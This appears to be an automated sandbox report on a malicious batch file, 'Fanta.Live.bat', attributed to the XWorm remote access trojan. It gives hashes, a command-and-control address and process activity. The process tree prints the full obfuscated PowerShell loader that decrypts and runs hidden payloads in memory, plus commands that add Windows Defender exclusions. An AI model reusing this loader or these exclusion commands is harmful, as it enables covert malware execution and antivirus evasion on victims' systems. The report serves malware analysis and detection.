Analysis

  • max time kernel
    42s
  • max time network
    46s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 16:29

General

  • Target

    Fanta.Live.bat

  • Size

    294KB

  • MD5

    1a62623af35e61ebb5cce084602a9de3

  • SHA1

    06c959f0bdb24bb40bad2f1b1608e2ae8f4efd13

  • SHA256

    d9765f4bf067e521fd60ce58dae185d3b2684acc8bb758f2109474a31697a517

  • SHA512

    38721b6b83286bee42c4fae39e36c5c70a36c0e33920ecdb465829542953ab08575c866d2b01166718e7c01e7ab0871f2e6f0acffbdaf9692836d496e74a2f8c

  • SSDEEP

    6144:ZQD9RNujVNSqoQWl4dDUHbWzZIePg+yCeafR/YevM:uD9RcBNL1DUH6zqeP/yZafhYl

Malware Config

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EjxD+xG7Na85kgGlTssEAc5Xt3CgTxOC1t6l3g3FG9U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ycEEbUWQfAwiVVtAkmIW1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WtZPv=New-Object System.IO.MemoryStream(,$param_var); $hQDqP=New-Object System.IO.MemoryStream; $SROyA=New-Object System.IO.Compression.GZipStream($WtZPv, [IO.Compression.CompressionMode]::Decompress); $SROyA.CopyTo($hQDqP); $SROyA.Dispose(); $WtZPv.Dispose(); $hQDqP.Dispose(); $hQDqP.ToArray();}function execute_function($param_var,$param2_var){ $oAWqJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HLxpC=$oAWqJ.EntryPoint; $HLxpC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat';$ZKeYE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat').Split([Environment]::NewLine);foreach ($Xhjpq in $ZKeYE) { if ($Xhjpq.StartsWith(':: ')) { $JfogR=$Xhjpq.Substring(3); break; }}$payloads_var=[string[]]$JfogR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4160

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    96b7303b3c5d43ea97d4ead95821a029

    SHA1

    ea1ecce72a776cd922b090f28e9d5aaca1b27539

    SHA256

    7e6faa0a80301b4dae2c6d499e68ad269378909cdd2dca17e972ff80d296b40f

    SHA512

    edc84e846ca527e28702bf981482af921d7872af10aad705b4a527921f68bd06ce38d28c6254f4197f4985297500fcecc51a9f3051915345cd2cd474e0dcd288

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi5h5ney.4pm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/448-12-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/448-10-0x0000021BFB650000-0x0000021BFB672000-memory.dmp

    Filesize

    136KB

  • memory/448-13-0x0000021BFB680000-0x0000021BFB688000-memory.dmp

    Filesize

    32KB

  • memory/448-14-0x0000021BFD910000-0x0000021BFD94A000-memory.dmp

    Filesize

    232KB

  • memory/448-15-0x0000021BFD970000-0x0000021BFD988000-memory.dmp

    Filesize

    96KB

  • memory/448-45-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/448-44-0x00007FFB9F583000-0x00007FFB9F585000-memory.dmp

    Filesize

    8KB

  • memory/448-43-0x0000021BFE060000-0x0000021BFE06C000-memory.dmp

    Filesize

    48KB

  • memory/448-0-0x00007FFB9F583000-0x00007FFB9F585000-memory.dmp

    Filesize

    8KB

  • memory/448-11-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-30-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-27-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-26-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-16-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB